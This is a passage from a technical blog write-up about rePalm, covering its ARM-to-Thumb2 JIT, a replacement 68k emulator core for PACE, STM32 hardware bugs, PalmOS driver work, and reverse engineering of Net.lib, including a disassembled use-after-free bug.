Basically the same way we did for the emulator. We create a per-thread translation cache (TC) which will hold our translations. Why per thread? Because this avoids the problem of one thread flushing the cache while another is running in it with no end in sight. The TC will contain translation units (TU) each of which represents some translated code. Each TU contains its original "source" ARM address, and then just valid Thumb2 code. There will also be a hashtable which will map source "ARM" addresses to a bucket where the first TU for that hash value is stored. Each bucket is a linked list, and 4096 buckets are used. This is configurable. A fast & simple hash is used. Tested on a representative sample of addresses it gave good distribution. Now, whenever we take a UsageFault that indicates an attempted entry to ARM mode, we lookup the desired address in the hashtable. If we get a hit, we simply replace the PC in the exception frame with the "code" pointer of the matching TU and return. The CPU proceeds to execute native code quickly. Wonderful! What if we do not get a hit? We then save the state and replace the PC in the exception frame with the address of the translation code (we do not want to translate in kernel mode).

Parlez-vous ARM?

The front end of a JIT basically just needs to ingest ARM instructions and understand them. We'll trap on any we do not understand, and try to translate all those that we do. Here we hit our first snag. Some games use instructions that are not valid. Bejeweled, I am looking at you! The game "Bejeweled" has some ARM code included in it and it likes to return by executing LDMDB R11, {R0-R12, SP, PC}^ . Ignoring the fact that R0-R2 and R12 do not need to be saved and they are being inefficient, that is also not a valid instruction to execute in user mode at all. That little caret at the end means "also transfer SPSR to CPSR ". That request is invalid in user mode and ARM architecture reference manual is very clear that executing this in user mode will have undefined effects. This explains why Bejeweled did not run under rePalm under QEMU. QEMU correctly refused to execute this insanity. Well, I dragged out a Palm device out of a drawer and tested to see what actually happens if you execute this. Turns out that it is just ignored. Well, I guess my JIT will do that too. My emulator cores had no trouble with this instr since as this instr is undefined, treating it like it has no caret was safe, and thus they never even checked the bit that indicated it.

Luckily for us, ARM only has a few instruction formats. Unluckily for us they are all pretty complex. Luckily, decoding is easy. Almost every ARM instruction is conditional and the top 4 bits determine if it executes at all or does not. Data Processing operations are always 3-operand. Destination reg, Source reg, and "Operand" which is ARM's addressing mode 1. It can be an immediate of certain forms, a register, a register shifted by an immediate, or a register shifted by a register. Say what?! Yup, you can do things like ADD R0, R1, R2, ROR R3 . Be scared. Be very scared! Setting flags is optional. Loading/storing bytes or words uses addressing mode 2, which allows a use of a register plus/minus an immediate, or register plus/minus register, or register plus/minus register shifted by an immediate. All of these modes can be index, postindex, or index-with-writeback, so scary things like LDR R0, [R1], R2, LSL #12 can be concocted. Loading/storing halfwords or signed data uses addressing mode 3, which is just like mode 2 except no register shifts are available. This mode is also used for LDRD and STRD instructions that some ARMv5 cores implement (this is part of the optional DSP extension). Addressing mode 4 is used for LDM and STM instructions, which are terrifying in their complexity and number of corner cases. They can load or store any subset of registers to a given base address with pre-or-post increment-or-decrement and optional writeback. They are used for stack ops. And last, but not least, there are branches which are all encoded simply and decode easily. Phew...

2 Thumbs do not make an ARM

Initially the thought was that the translation cannot be all that hard? The instructions look similar, and it shouldn't be all that bad. Then reality hit. Hard. Thumb2 has a lot of restrictions on operands, like for example SP cannot at all be treated like a general register, and LR and PC cannot ever be loaded together. It also lacks anything equalling addressing mode 1's ability to shift a register by a register as a third operand to an ALU operation. It lacks ability to shift a third register by more than 3, like mode 2 can in ARM. I am not even going to talk about LDM and STM ! Oh, and then there is the issue of not letting the translated code know it is being translated. This means that it must still think it is running from original place, and if it reads itself, see ARM instructions. This means that we cannot ever leak PC's real value into any executable state. The practical upshot of that is that we can never emit a BL instruction, and whenever PC is read, we must instead produce an immediate value which is equal to what PC would have been, had the actual ARM code run from its actual place in memory. Not fun...

Thumb2's LDM / STM actually lack half the modes that ARM has (modes ID and DA ) so we'd have to expand those instructions to a lot more code. Oh, and Thumb has limits on writeback that do not match ARM's (more strict) and also you can never use SP in the register set, nor can you ever store PC this way in Thumb2. At this point it becomes abundantly clear that this will not be an easy instruction in -> instruction out job. We'll need places to store temporary immediates, we'll need to rewrite lots of instructions, and we'll need to do it all without causing side effects. Oh, and it should be fast too!

A JIT's job is never over

LDM and STM, may they burn in hell forever!

How LDM/STM work in ARM

ARM has two multiple-register ops: LDM and STM . Each has a few addressing modes. First is the order: up or down in addresses (that is, does the base register address where to store the lowest-numbered register or highest. Next is whether the base register itself is to be used, or should it be incremented/decremented first. This gives us the four basic modes: IA ("increment after"), IB ("increment before"), DA ("decrement after"), DB ("decrement before"). Besides that, it is optional to writeback the updated base address to the base register. There are of course corner cases, like what value gests stored if base register with writeback is stored, or what value the base register will have if loaded, while writeback is also specified. ARM spec explicitly defines some of these cases as having unpredictable consequences.

For stack, ARM uses a full-descending stack. That means that at any point, the SP register points to the last ALREADY USED stack position. So, to pop a value, you load it from [SP] , and then increment SP by 4. This would be done using an LDM instruction with an IA addressing mode. To push a value unto the stack, one should first decrement SP by 4, and then store the desired value into [SP] . This corresponds to an STM instruction with an DB addressing mode. IB and DA modes are not used for stack in normal ARM code.

How LDM/STM work in Thumb2

So why did I tell you all this? Well, while designing the Thumb2 instruction set, ARM decided what to support and what not to. This basically meant that uncommon things did not get carried forward. Yup...you see where this is going. Thumb2 does not support IB and DA modes. At all. Not cool. But there is more. Thumb2 forbids using PC or SP registers in the list of registers to be stored for STM . Thumb2 also forbids ever loading SP using LDM , also if an LDM loads PC , it may not also load LR , and if it loads LR , it may not also load PC . There is more yet... PC is not allowed as the base register, and the register list must be at least two registers long. This is a somewhat-complete list of what Thumb2 is missing compared to ARM.

But wait, there is more. Even the instrutions that map nicely from ARM to Thumb2 and comply with all the restrictions of Thubm2 are not that simple to translate. For example, storing PC , is as always hard - we need a spare register to store the expected PC value so we can push it. But, registers are pushed in order, so depending on what register we pick as our temporary reg, it might be out of other relative to others, we might need to split the store into a few stores. But, there is more yet. What if the store was to SP or included SP ? We changed SP by pushing our temp reg, so we need to adjust for that. But what if this was a STMDB SP! (aka: PUSH ). Then we cannot pre-push a temp register that easily...

But wait, there's more ... pain

There is another complication. LDM / STM is expected to act as an atomic instruction to userspace. It is either aborted or resumable at system level. But in Thumb2 in Cortex-M chips, SP is special since the exception frame gets stored there. This means that SP must always be valid, and any data stored BELOW SP is not guaranteed to ever persist (since an interrupt may happen anytime). Luckily, on ARM it was also discouraged to store data below SP and this was rarely done. There is one common piece of PalmOS code that does this: the code around SysLinkerStub that is used to lazy-load libraries. For other reasons rePalm replaced this code anyways though. In all other cases the JIT will emit a warning if an attempt is made to load/store below SP .

As you see, this is very very very complex. In fact, the complete code to translate LDM / STM ended up being just over four thousand lines long and the worst-case translation can be 60-ish bytes. Luckily this is only for very weird instructions the likes of which I have never seen in real code. "So," you might ask, "how could this be tested if no code uses it?" I actually used a modified version of my uARM emulator to emulate both orignal code and translated code to verify that each destination address is loaded/stored once exactly and with proper vales only, and then made a test program that would generate a lot of random valid LDM / STM instructions. It was then left to run over a few weeks. All bugs were exterminated with extreme prejudice, and I am now satisfied that it works. So here is how the JIT handles it, in general (look in "emuJit.c" for details).

Translating LDM/STM

  1. Check if the instruction triggers any undefined behaviour, or is otherwise not defined to act in a particular way as per the ARM Architecture Reference Manual. If so, log an error and bail out.
  2. Check if it can be emitted as a Thumb2 LDM / STM , that is: does it comply with ALL the restrictions Thumb2 imposes, and if so, and also if PC is not being stored, emit a Thumb2 LDM / STM
  3. Check if it can be emitted as a LDR / STR / LDRD / STRD while complying with Thumb2 limits on those. If so, that is emitted.
  4. A few special fast cases to emit translations for common cases that are not covered by the above (for example ADS liked to use STMIB for storing function parameters to stack)
  5. For unsupported modes IB and DA , if no writeback is used, they can be rewritten in terms of the supported modes.
  6. If instruction loads SP , it is impossible to emit a valid translation due to ohw ARMv7-M uses SP . For this one special case, the JIT emits a special undefined instruction and we trap it and emulate it. Luckily no common code uses this ever!
  7. Finally, the generic slow path is taken:
    1. Generate a list of registers to be loaded/stored, and at what addresses.
    2. Calculate writeback if needed.
    3. If needed, allocate a temporary register or two (we need two if storing PC and SP) and spill their contents to stack
    4. For all registers left to be loaded/stored, see how many we can load/store at once, and do so. This involves emitting a set of instructions: LDR / STR / LDRD / STRD / LDM / STM until all is done.
    5. If we had allocated temporary registers, restore them

Slightly less hellish instructions

Addressing mode 1 was hard as well. Basically thanks to those rotate-by-register modes, we need a temporary register to calculate that value, so we can then use it. If the destination register is not used, we can use that as temp storage, since it is about to be overwritten anyways by the result, unless it is also one of the other source operands..or SP ...or PC ... oh god, this is becoming a mess. Now what if PC is also an operand? We need a temporary register to load the "fake" PC value into before we can operate on it. But once again we have no temporary registers. This got messy very quickly. Feel free to look in "emuJit.c" for details. Long story short: we do our best to not spill things to stack but sometimes we do have to.

The same applies to some complex addressing modes. Thumb2 optimized its instructions for common cases, which makes uncommon cases very hard to translate. Here it is even harder to find temporary registers, because if we push anything, we might need to account for that if our base register is SP . Once again: long story, scary story, see "emuJit.c". Basically: common things get translated efficiently, uncommon ones are not. Special case is PC-based loads. These are used to load constant data. In most cases we inline the constant data into the produced translations for speed.

Conditional instructions

Thumb2 does have ways to make conditional instructions: the IT instruction that makes the next 1-4 instructions conditional. I chose not to use it due to the fact that it also changes how flags get set by 2-byte Thumb instructions and I did not want to special case it. Also sometimes 4 instructions are not enough for a translation. Eg: some STMDA instructions expand to 28 instructions or so. I just emit a branch of opposite polarity (condition) over the translation. This works since these branches are also just 2 bytes long for all possible translation lengths.

Jumps & Calls

This is where it gets interesting. Basically there are two type of jumps/calls. Those whose destinations are known at translation time, and those whose are not. Those whose addresses are known at translation time are pretty simple to handle. We look up the destination address in our TC. If it is found, we literally emit a direct jump to that TU. This makes hot loops fast - no exit from translated code is needed. Indirect or computed jumps are not common, so one would think that they are not that important. This is wrong because there is one type of such jump that happens a lot: function return. We do not, at translation time, know where the return is going to go to. So how do we handle it? Well, if the code directly loads PC , everything will work as expected. Either it will be an ARM address and our UsageFault handler will do its thing or it will be a Thumb address and our CPU will jump to it directly. An optimization exists in case an actual BX LR instruction is seen. We then emit a direct jump to a function that looks up LR in the hash - this saves us the time needed to take an exception and return from it (~60 cycles). Obviously more optimizations are possible, and more will be added, but for now, this is how it is. So what do we do for a jump whose destination is known and we haven't yet translated it? We leave ourselves a marker, namely an instruction we know is undefined, and we follow that up with the target address. This way if the jump is ever actually taken (not all are), we'll take the fault, translate, and then replace that undefined instr and the word following it with an actual jump. Next time that jump will be fast, taking no faults.

Translating a TU

The process is easy: translate instructions until we reach one that we decide is terminal. What is terminal? An unconditional branch is terminal. A call is too (conditional or not). Why? Because someone might return from it, and we'd rather have the return code be in a new TU so we can then find it when the return happens. An unconditional write to PC of any sort is terminal as well. There is a bit of cleverness also for jumps to nearby places. As we translate a TU, we keep track of the last few dozen instructions we translated and where their translations ended up. This way if we see a short jump backwards, we can literally inline a jump to that translation right in there, thus creating a wonderfully fast translation of this small loop. But what about short jumps forward? We remember those as well, and if before we reach our terminal instr we translate an address we remembered a past jump to from this same TU, we'll go back and replace that jump with a short one to here.

And if the TC is full?

You might notice that I said we emit jumps between TUs. "Doesn't this mean," you might ask, "that you cannot just delete a single TU?" This is correct. Turns out that keeping track of which TUs are used a lot and which are not is too much work, and the benefits of inter-TU jumps are too big to ignore. So what do we do when the TC is full? We flush it - literally throw it all away. This also helps make sure that old translations that are no longer needed eventually do get tossed. Each thread's TC grows up to a maximum size. Some threads never run a lot of ARM and end up with small TCs. The TC of the main UI thread will basically always grow to the maximum (currently 32KB).

Growing up

After the JIT worked, I rewrote it . The initial version was full of magic values and holes (cases that could happen in legitimate code but would be mistranslated). It also sometimes emitted invalid opcodes that Cortex-M4 would still execute (despite docs saying they were not allowed). The JIT was split into two pieces. The first was the frontend that ingested ARM instructions, maintained the TC, and kept track of various other state. The second was the backend. The backend had a function for each possible ARMv5 addressing mode or instruction format, and given ANY valid ARMv5 instruction, it could produce a sequence of ARMv7M instructions to perform the same task. For common cases the sequence was well optimized, for uncommon ones, it was not. However, the backend handles ANY possible valid ARMv5 request, even insane things like, for example, RSBS PC, SP, PC, ROR SP . No sane person would ever produce this instruction, but the backend will properly translate it. I wrote tests and ran them automatically to verify that all possible inputs are handled, and correctly so. I also optimized the hottest path in the whole system - the emulation of the BLX instruction in thumb. It is now a whopping 50 cycles faster, which noticeably impacted performance. As an extra small optimization, I noticed that oftentimes Thumb code would use a BLX simply to jump to an OsCall (which due to using R12 and R9 cannot be written in Thumb mode). The new BLX handler detects this and skips emulation by calling the requisite OsCall directly.

I then wrote a sub-backend for the EDSP extension (ARMv5E instructions) since some Sony apps use them. The reason for a separate sub-backend is that ARMv7E (Cortex-M4) has instructions we can use to translate EDSP instructions very well, while ARMv7 (Cortex-M3) does not, and requires longer instruction sequences to do the same work. rePalm supports both.

Later, I went back and, despite it being a huge pain, worked out a way to use the IT instruction on Cortex-M3+. This resulted in a huge amount of code refactoring - basically pushing "condition code" to every backend function and expecting it to conditionalize itself however it wishes. This produced a change with an over-4000-line diff but it workes very well and resulted in a noticeable speed icnrease!

The Cortex-M0 backend

Why this is insane

It was quite an endeavor, but I wanted to see if I could make a working Cortex-M0 backend for my JIT. Cortex-M0 executes the ARMv6-m instruction set. This is basically just Thumb-1, with a few minor additions. Why is this scary? In Thumb-1, most instructions only have access to half the registers (r0..r7). Only three instructions have access to high registers: CMP , MOV , and ADD . Almost all Thumb-1 instructions always set flags. There are also no long-multiply instructions in Thumb-1. And, there is no RRX rotation mode at all. The confluence of all these issues makes attempting a one-to-one instruction-to-instruction translation from ARM to Thumb-1 a non-starter.

To make it all work, we'll need some temporary working space: a few registers. It is all doable with three with a lot of work, and comfortable with four. So I decided to use four work registers. We'll also need a register to point to our context (the place where we'll store extra state). And, for speed, we'll want a reg to store the virtual status register. Why do we need one of those? Because almost all of our Thumb-1 instructions clobber flags, whereas the ARM code we're translating expects flags to stick around during long instruction sequences. So our total is: 6. We need 6 registers. They need to be low registers since, as we had discussed, high registers are basically useless in Thumb-1.

The basics

Registers r0 through r3 are temporary work registers for us. The r4 register is where we keep our virtual status register, and r5 points to our context. We use r12 as another temporary. Yes it is a high-reg but sometimes we really just need to store something, so only being able to MOV something in and out of it is enough. So, what's in a context? Well, then state of the virtual r0 through r5 registers, as well as the virtual r12 and the virtual lr register. There, obviously, needs to be a separate context for every thread, since they may each run different ARM code. We allocate one the first time a thread runs ARM (it is actually part of the JIT state, and we copy it if we reallocate the JIT state).

"But," you might say, "if PalmOS's Thumb code expects register values in registers, and our translated ARM code keeps some of them in a weird context structure, how will they work together?" This is actually complex. Before every translation unit, we emit a prologue. It will save the registers from our real registers into the context. At the end of every translation unit, we emit an epilogue that restores registers from the context into the real registers. When we generate jumps between translation units, we jump past these pieces of code, so as long as we are running in the translated code, we take no penalty for saving/restoring contexts. We only need to take that penalty when switching between translated code and real Thumb code. Actually, it turns out that the prologue and epilogue are large enough that emitting then inside every TU is a huge waste of space, so we just keep a copy of each inside a special place in the context, and have each TU just call them as needed. A later speed improvement I added was to have multiple epilogues, based on whether we know that the code is jumping to ARM code, Thumb code, or "not sure which". This allows us to save a few cycles on exiting translated code. Every cycle counts!

Fault dispatching

There is just one more problem: Those BLX instructions in Thumb mode. If you remember, I wrote about how they do not exist in ARMv7-m. They also do not exist in ARMv6-m. So we also need to emulate them. But, unlike ARMv7-m, ARMv6-m has no real fault handling ability. All faults are considered unrecoverable and cause a HardFault to occur. Clearly something had to be done to work around that. This actually led to a rather large side-project, which I published separately: m0FaultDispatch . In short: I found a way to completely and correctly determine the fault cause on the Cortex-M0, and recover as needed from many types of faults, including invalid memory accesses, unaligned memory accesses, and invalid instructions. With this final puzzle piece found, the Cortex-M0 JIT was functional.

Is PACE fast enough?

Those indirect jumps...

Unfortunately, emulation almost always involves a lot of indirect jumps. Basically that is how one does instruction decoding. 68k being a CISC architecture with variable-length instructions means that the decoding stage is complex. PACE 's emulator is clearly hand-written in assembly, with some tricks. It is all ARM. It is actualy the same instruction-for-instruction from PalmOS 5.0 to PalmOS 5.4. The surrounding code changed, but the emulator core did not. This is actually good news - means it was good as is. My JIT properly and correctly handles translating PACE , as evidenced by the fact that rePalm works on ARMv7-M. The main problem is that every instruction emulated requires at least one indirect jump (for common instructions), two for medium-comonness ones, and up to three some some rare ones. Due to how my JIT works, each indirect jump that is not a function return requires an exception to be taken (14 cycles in, 12 out), some glue code (~30 cycles), and a hash lookup (~20 cycles). So even in case that the target code has been translated, this adds 70-ish cycles to each indirect jump. This puts a ceiling on the efficiency of the 68k emulator at 1/70th the speed. Not great. PACE usually is about 1/15 the speed of the native code, so that is quite a slowdown. I considered writing better translation just for PACE , but it is quite nontrivial to do fast. Simply put, there isn't a simple fast way to translate something like LDR R0, [R11, R1, LSL #2]; ADD PC, R11, R0 . There simply is no way to know where that jump will go, or that even R11 points to a location that is immutable. Sadly that is what PACE 's top level dispatch looks like.

A special solution for a special problem

I had already fulfilled my goal of running PalmOS unmodified - PACE does work with my JIT, and the OS is usable and not slow, but I wanted a better solution and decided that PACE is a unique-enough problem to warrant it. The code emulator in PACE has a single entry point, and only calls out to other code in a 10 clear cases: Line1010 (instruction starting with 0xA), Line1111 (instruction starting with 0xF), TRAP0, TRAP8, TRAPF (OsCall), Division By Zero, Illegal instrction, Unimplemented instruction, Trace Bit being set, and hitting a PC value of precisely 0xFFFFFFF0. So what to do? I wrote a tool "patchpace" that will take in a PACE.prc from any PalmOS device, analyze it to find where those handlers are in the binary, and find the main emulator core. It will then replace the core (in place if there is enough space, appended to the binary if not) with code you provide. The handler addresses will be inserted into your code at offsets the header provides, and a jump to your code will be placed where the old emulator core was. The header is very simple (see "patchpace.c") and just includes halfword offsets from the start of the binary to the entry, and to where to insert jumps to each of the abovementioned handlers as BL or BLX instructions). The only param to the emulator is the state. It is structured thusly: first word is free for emulator to use as it pleases, then 8 D-regs, then the 8 A-regs, then PC, and then SR. No further data is allowed (PACE uses data after here). This same state must be passed to all the handlers. TRAPF handler also needs the next word passed to it (OsCall number). Yes, you understand this correctly, this allows you to bring your own 68k emulator to the party. Any 68k emulator will do, it does not need to know anything about PalmOS at all. Pretty sweet!

Any 68k emulator...

So where do we get us a 68k emulator? Well, anywhere? I wrote a simple one in C to test this idea, and it worked well, but really for this sort of thing you want assembly. I took PACE's emulator as a style guide, and did a LOT of work to produce a thumb2 68k emulator. It is much more efficient than PACE ever was. This is included in the "mkrom" folder as "PACE.0003.patch". As stated before, this is entirely optional and not required. But it does improve raw 68k speed by about 8.4x in the typical case.

But, you promised hardware...

Hardware has bugs

I needed a dev board to play with. The STM32F429 discovery board seemed like a good start. It has 8MB of RAM which is enough, 2MB of flash which is good, a display with a touchscreen. Basically it is perfect on paper. Oh, if only I knew how imperfect the reality is. Reading the STM32F429 reference manual it does sound like the perfect chip for this project. And ST does not quite go out of their way to tell you where to find the problems. The errata sheet is damning. Basically if you make the CPU run from external memory, put the stack in external memory, and SDRAM FIFO is on, exceptions will crash the chip (incorrect vector address read). OK, I can work around that - just turn off the FIFO. Next erratum: Same story but if the FIFO is off, sometimes writes will be ignored and not actually write. Ouchy! Fine! I'll move my stacks to internal RAM. It is quite a rearchitecturing, but OK, fine! Still crashes. No errata about that! What gives? I removed rePalm and created a 20-line repro scenario. This is not in ST's errata sheet, but here is what I found: if PC points to external RAM, and WFI instruction is executed (to wait for interrupts in a low power mode), and then an interrupt happens after more than 60ms, the CPU will take a random interrupt vector instead of the correct one after waking up! Just imagine how long that took to figure out! How many sleepless nights ripping my hair out at random crashes in interrupt handlers that simply could not possibly be executing at that time! I worked around this by not using WFI. Power is obviously wasted this way, but this is ok for development for now, until I design a board with a chip that actually works!

Next issue: RAM adddress. STM32F429 supports two banks of RAM 0 and 1. Bank 0 starts at 0xC0000000 and Bank 1 at 0xD0000000 . This is a problem because PalmOS needs both RAM and flash to be below 0x80000000 . Well, we're lucky. RAM Bank 0 is remappable to 0x00000000 . Sweet.... Until you realize that whoever designed this board hated us! The board only has one RAM chip connected, so logically it is Bank 0. Right? Nope! It is Bank 1, and that one is not remappable. Well, damn! Now we're stuck and this board is unusable to boot PalmOS. The 0x80000000 limit is rather set in stone.

So why the 0x80000000 limit?

PalmOS has two types of memory chunks: movable and nonmovable. This is what an OS without access to an MMU does to avoid too much memory fragmentation. Basically when a movable chunk is not locked, the OS can move it, and one references it using a "handle". One can then lock it to get a pointer, use it, and then unlock when done. So what has this got to do with 0x80000000 ? PalmOS uses the top bit of a pointer to indicate if it is a handle or an actual pointer. The top bit being set indicates a handle, clear indicates a pointer. So now you see that we cannot really live with RAM and ROM above 0x80000000 . But then again, maybe...

Two wrongs do not make a right, but do two nasty hacks?

Given that I've already decided that this board was only for temporary development, why not go further? Handle-vs-pointer disambiguation is only done in a few places. Why not patch them to invert the condition? At least for now. No, not at runtime. I actually disassembled and hand-patched 58 places total. Most were in Boot , where the MemoryManager lives, a few were in UI since the code for text fields likes to find out of a pointer passed to it is a pointer (noneditable) or a handle (editable). There were also a few in PACE since m68k had a SysTrap to detemine the kind of pointer, which PACE implemented internally. Yes, this is not anymore "unmodified PalmOS" but this is only temporary, so I am willing to live with it! But, you might ask, didn't you also say that ROM and RAM both need to be below 0x80000000 ? If we invert the condition, we need them both above. But flash is at 0x08000000 ... Oops. Yup, we cannot use flash anymore. I changed the RAM layout again, carving out 2MB at 0xD0600000 to be the fake "ROM" and I copy the flash to it at boot. It works!

Tales of more PalmOS reverse engineering

SD-card Support

Luckily, I had written a slot driver for PalmOS before, so writing an SD card driver was not hard. In fact, I reused some PowerSDHC source code! rePalm supports SD cards now on the STM32F469 dev board. On the STM32F429 board, they are also supported, but since the board lacks a slot, you need to wire them up yourself (CLK -> C12, CMD -> D2, DAT_0 -> C8). Due to how the board is already wired, only one-bit-wide bus will work (DAT_1 and DAT_2 are used for other tthings and cannot be remapped to other pins), so that limits the speed. Also since your wires will be long and floppy, they maximum speed is also limited. This means that on the STM32F429 the speed is about 4Mbit/sec. On the STM32F469 board the speed is a much more respectable 37MBit/sec. Higher speeds could be reached with DMA, but this is good enough for now. While writing the SD card support for the STM32F4 chips, I found a hardware bug, one that was very hard to debug. The summary is this: SD bus allows the host to stop the clock anytime. So the controller has a function to stop it anytime it is not sending commands or sending/receiving data. Good so far. But that data lines can also be used to signal that the card is busy. Specifically, the DAT_0 line is used for that. The problem is that most cards use the clock line as a reference as to when they can change the state of the DAT lines. This means that if you do something that the card can be busy after, like a write, and then shut down the clock, the card will keep the DAT_0 line low forever, since it is waiting for the clock to tick to raise it. "So," you will ask, "why not enable clock auto-stopping except for this one command?" It does not work since clock auto-stopping cannot be easily flipped on and off. Somehow it confuses the module's internal state machine if it is flipped while the clock is running. So, why stop the clock at all? Minor power savings. Definitely not enough to warrant this mess, so I just disabled the auto-stopping function. A week to debug, and a one line fix! The slot driver can be seen in the "slot_driver_stm32" directory.

Serial Port Support

Palm Inc did document how to write a serial port driver for PalmOS 4. There were two types: virtual drivers and serial drivers. The former was for ports that were not hardwired to the external world (like the port connected to the bluetooth chip or the Infra-red port), and the second for ports that were (like the cradle serial port). PalmOS 5 merged the two types into a unified "virtual" type. Sadly this was not documented. It borrowed from both port types in PalmOS 4. I had to reverse engineer the OS for a long time to figure it out. I produced a working idea of how this works on PalmOS 5, and you can see it in "vdrvV5.h" include file. This information is enough to produce a working driver for a serial port, IrDA SIR port, and USB for HotSync purposes.

Actually making the serial port work on the STM32F4 hardwre was a bit hard. The hardware has only a single one-byte buffer. This means that to not lose any received data at high data rates, one needs to use hardware flow control or make the serial port interrupt the highest priority and hope for the best. This was unacceptable for me. I decided to use DMA. This was a fun chance to write my first PalmOS 5 library that can be used by other libraries. I wrote a DMA library for STM32F4-series chips. The code is in the "dma_driver_stm32" directory. With this, one would think that all would be easy. No. DMA needs to know how many bytes you expect to receive. In case of generic UART data receive, we do not know this. So how do we solve this? With cleverness. DMA can interrupt us when half of a transfer is done, and again when it is all done. DMA can be circular (restart from beginning when done). This gets us almost as far as we need to go. Basically as long as data keeps arriving, we'll keep getting one of these interrupts, and then the other in order. In our interrupt handler, we just need to see how far into the buffer we are, and report the bytes since last time we checked as new data. As long as our buffer is big enough that it does not overflow in the time it takes us to handle these interrupts we're all set, right? Not quite. What if we get just one byte? This is less than half a transfer so we'll never get an interrupt at all, and thus will never report this to the clients. This is unacceptable. How? STM32F4 UART has "IDLE detect" mode. This will interrupt us if after a byte has been RXed, four bit times have expired with no further character starting. This is basically just what we need. If we wire this interrupt to our previous handling code for the circular buffer, we'll always be able to receive data as fast as it comes, no matter the sizes. Cool! The Serial driver I produced does this, and can be seen in the "uart_driver_stm32" directory. I was able to successfully Hotsync over it! IrDA is supported too. It works well. See the photo album for a video demo!

Yes, you can try it!

If you want to try, on the STM32F429 discovery board, the "RX" unpopulated 0.1 inch hole is the STM32's transmit (yes I know, weird label for a transmit pin). B7 is STM32's receive pin. If you connect a USB-to-serial adapter there, you can hotsync over serial. If you instead connect an IrDA SIR transciever there, you'll get working IR. I used MiniSIR2 transciever from Novalog, Inc. It is the same one as most Palm devices use.

Vibrate & LED support

Adding vibration and LED support was never documented, since those are hardware features that vendors handle. Luckily, I had reverse engineered this a long time ago, when I was adding vibration support to T|X . Turns out that I almost got it all right back then. A bit more reverse engineering yielded a complete result of the proper API. LED follows the same API as vibrator: one "GetAttributes" function and one "SetAttributes" function. The settable things are the pattern, speed, delay in betweern repetitions, and number of repetitions. The OS uses them as needed and automatically adds "Vibrate" and "LED" settings to "Sounds and Alerts" preferences panel if it notices the hardware is supported. And rePalm now supports both! The code is in "halVibAndLed.c", feel free to peruse it at your leisure.

Networking support (WIP)

False starts

I really wanted to add support for networking to rePalm. There were a few ways I could think of to do that, such that all existing apps would work. One could simply replace Net.lib with one with a similar interface but controlled by me. I could then wire it up to any interface I wanted to, and all would be magical. This is a poor approach. To start with, while large parts of Net.lib are documented, there are many parts that are not. Having to figure them out would be hard, and proving correctness and staying bug-compatible even more so. Then there is the issue with wanting to run an unmodified PalmOS. Replacing random libraries diminishes the ability to claim that. No, this approach would not work. The next possibility was to make a fake serial interface, and tell PalmOS to connect via it, via SLIP or PPP to a fake remote machine. The other end of this serial port could go to a thread that talks to our actual network interface. This can be made to work. There would be overhead of encoding and decoding PPP/SLIP frames, and the UI would be confusing and all wrong. Also, I'd need to find ways to make the config UI. This is also quite a mess. But at least this mess is achievable. But maybe there is a better approach?

The scary way forward

Conceptually , there is a better approach. PalmOS's Net.lib supports pluggable network interfaces (I call it a NetIF driver). You can see a few on all PalmOS devices: PPP, SLIP, Loopback. Some others also have one for WiFi or Cellular. So all I have to do is produce a NetIF driver. Sounds simple enough, no? Just as you'd expect, the answer is a strong, resounding, and unequivocal "no!" Writing NetIF drivers was never documented. And a network interface is a lot harder than a serial port driver (which was the previous plug-in driver interface of PalmOS that I had reverse engineered). Reverse engineering this would be hard.

Those who study history...

I started with some PalmOS 4.x devices and looked at SLIP/PPP/Loopback NetIF drivers. Why? Like I had mentioned earlier, in 68k, the compiler tends to leave function names around in the binary unless turned off. This is a huge help in reverse engineering. Now, do not let this fool you, function names alone are not that much help. You still need to guess structure formats, parameters, etc. Thus despite the fact that Net.lib and NetIF driver interface both changed between PalmOS 4.x and PalmOS 5.x, figuring out how NetIF drivers worked in PalmOS 4.x would still provide some foundational knowledge. It took a few weeks until I thought I had that knowledge. Then I asked myself: "Was there a PalmOS 4.x device with WiFi?" Hm... There was. Alphasmart Dana Wireless had WiFi. Now that I thought I had a grip on the basics of how these NetIF drivers worked, it was time to look at a more complex one since PPP, SLIP, and Loopback are all very simple. Sadly, Alphasmart's developers knew how to turn off the insertion of function names into the binary. Their WiFi driver was still helpful, but it took weeks of massaging to make sense of it. It is approximately at this point that I realized that Net.lib had many versions and I had to look at others. I ended up disassembling each version of Net.lib that existed to see the evolution of the NetIF driver interface and Net.lib itself. Thus I looked at Palm V's version, Palm Vx's, Palm m505's, and Dana's. The most interesting changes were with v9, where support for ARP & DHCP was merged into Net.lib , whereas previously each NetIF driver that needed those, embedded their own logic for them.

On to OS 5's Net.lib

This was all nice and great, but I was not really in this to understand how NetIF drivers worked in PalmOS 4.x. Time had come to move on to reverse-engineering how PalmOS 5.x did it. I grabbed a copy of Net.lib from the T|T3, and started tracing out its functions, matching them up to their PalmOS 4.x equivalents. It took a few more weeks, but I more or less understood how PalmOS 5.x Net.lib worked.

I found a bug!

Along the way I found an actual bug: a use-after-free in arp_close()

NETLIB_T3:0001F580 CMP R4, #0 ; Linked list is empty? NETLIB_T3:0001F584 BEQ loc_1F5A4 ; if so, lust skip this entire thing NETLIB_T3:0001F588 B loc_1F590 ; else go free it one-by-one NETLIB_T3:0001F58C NETLIB_T3:0001F58C loc_1F58C: NETLIB_T3:0001F58C BEQ loc_1F598 ; this instr here is harmless, but makes no sense! We only get here on "NE" condition NETLIB_T3:0001F590 NETLIB_T3:0001F590 loc_1F590: NETLIB_T3:0001F590 MOV R0, R4 ; free the node NETLIB_T3:0001F594 BL MemChunkFree ; after this, memory pointed to by R4 is invalid (freed) NETLIB_T3:0001F598 NETLIB_T3:0001F598 loc_1F598: NETLIB_T3:0001F598 LDR R4, [R4] ; load "->next" from now-invalid memory... NETLIB_T3:0001F59C CMP R4, #0 ; see if it is NULL NETLIB_T3:0001F5A0 BNE loc_1F58C ; and if not, loop to free that node too NETLIB_T3:0001F5A4 loc_1F5A4:

Well, that was easy...

Then I started disassembling PalmOS 5.x SLIP/PPP/Loopback NetIF drivers to see how they had changed from PalmOS 4.x. I assumed that nobody really changed their logic, so any changes I see could be hints on changed in the Net.lib and NetIF structure between PalmOS 4.x and PalmOS 5.x. It turned out that not that much had changed. Structures got realigned, a few attribute values got changed, but otherwise it was pretty close. It is at this point that I congratulated myself, and decided to start writing my own NetIF driver to test my understanding.

NOT!

